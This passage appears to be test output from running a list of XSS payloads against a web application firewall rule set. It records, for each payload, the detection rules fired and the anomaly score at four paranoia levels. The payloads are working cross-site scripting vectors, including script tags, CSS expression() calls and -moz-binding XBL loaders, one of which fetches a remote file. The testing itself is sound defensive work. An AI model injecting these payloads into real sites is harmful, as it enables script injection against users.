942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 25
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 38
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 51
****** payload-238 ********
Payload:
payload=<form action=x><button>XSS</button><select name=x><option><plaintext><script>token="supersecret"</script></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 20
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 43
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 56
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 69
****** payload-239 ********
Payload:
payload=<div style="-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">
--- Paranoia Level 1 ---
941180 PL1 Node-Validator Blacklist Keywords
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
Total Incoming Score: 20
--- Paranoia Level 2 ---
941180 PL1 Node-Validator Blacklist Keywords
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942210 PL2 Detects chained SQL injection attempts 1/2
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
Total Incoming Score: 45
--- Paranoia Level 3 ---
941180 PL1 Node-Validator Blacklist Keywords
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942210 PL2 Detects chained SQL injection attempts 1/2
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 61
--- Paranoia Level 4 ---
941180 PL1 Node-Validator Blacklist Keywords
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942210 PL2 Detects chained SQL injection attempts 1/2
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 74
****** payload-240 ********
Payload:
payload=<div style="\-\mo\z-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">
--- Paranoia Level 1 ---
941180 PL1 Node-Validator Blacklist Keywords
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
Total Incoming Score: 20
--- Paranoia Level 2 ---
941180 PL1 Node-Validator Blacklist Keywords
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942210 PL2 Detects chained SQL injection attempts 1/2
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
Total Incoming Score: 50
--- Paranoia Level 3 ---
941180 PL1 Node-Validator Blacklist Keywords
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942210 PL2 Detects chained SQL injection attempts 1/2
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 66
--- Paranoia Level 4 ---
941180 PL1 Node-Validator Blacklist Keywords
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942210 PL2 Detects chained SQL injection attempts 1/2
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920460 PL4 Abnormal character escapes in request
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 84
****** payload-241 ********
Payload:
payload=<div style="-moz-bindin\67:url(//businessinfo.co.uk/lab s/xbl/xbl.xml#xss)">
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
Total Incoming Score: 10
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942210 PL2 Detects chained SQL injection attempts 1/2
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
Total Incoming Score: 35
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942210 PL2 Detects chained SQL injection attempts 1/2
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 51
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942210 PL2 Detects chained SQL injection attempts 1/2
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920460 PL4 Abnormal character escapes in request
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 69
****** payload-242 ********
Payload:
payload=<div style="-moz-bindin&amp;#x5c;67:url(//businessinfo.co.uk/lab s/xbl/xbl.xml#xss)"></a>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
Total Incoming Score: 15
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942210 PL2 Detects chained SQL injection attempts 1/2
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
Total Incoming Score: 40
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942210 PL2 Detects chained SQL injection attempts 1/2
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 53
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942210 PL2 Detects chained SQL injection attempts 1/2
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 74
****** payload-243 ********
Payload:
payload=<img src="blah" style="-moz-binding: url(data:text/xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22 http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js %22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20 document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%3C/ binding%3E%3C/bindings%3E)" /></a>
--- Paranoia Level 1 ---
941180 PL1 Node-Validator Blacklist Keywords
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941130 PL1 XSS Filter - Category 3: Attribute Vector
Total Incoming Score: 25
--- Paranoia Level 2 ---
941180 PL1 Node-Validator Blacklist Keywords
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
941340 PL2 IE XSS Filters - Attack Detected.
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 53
--- Paranoia Level 3 ---
942490 Detects classic SQL injection probings 3/3
933190 PHP Injection Attack: PHP Closing Tag Found
941180 PL1 Node-Validator Blacklist Keywords
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
941340 PL2 IE XSS Filters - Attack Detected.
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 79
--- Paranoia Level 4 ---
942490 Detects classic SQL injection probings 3/3
933190 PHP Injection Attack: PHP Closing Tag Found
941180 PL1 Node-Validator Blacklist Keywords
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
941340 PL2 IE XSS Filters - Attack Detected.
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 92
****** payload-244 ********
Payload:
payload=<div style=xss:expression(alert(1))>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
Total Incoming Score: 10
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 25
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 41
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 54
****** payload-245 ********
Payload:
payload=<div style=xss:expression(1)-alert(1)>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
Total Incoming Score: 10
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 25
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 38
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 51
****** payload-246 ********
Payload:
payload=<div style=xss:expressio\6e(alert(1))>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
Total Incoming Score: 10
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 25
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 41
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920460 PL4 Abnormal character escapes in request
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 59
****** payload-247 ********
Payload:
payload=<div style=xss:expressio\006e(alert(1))>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
Total Incoming Score: 10
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 25
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 41
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 54
****** payload-248 ********
Payload:
payload=<div style=xss:expressio\00006e(alert(1))>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
Total Incoming Score: 10
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 25
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 41
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 54
****** payload-249 ********
Payload:
payload=<div style=xss:expressio\6e(alert(1))>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
Total Incoming Score: 10
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 25
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 41
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
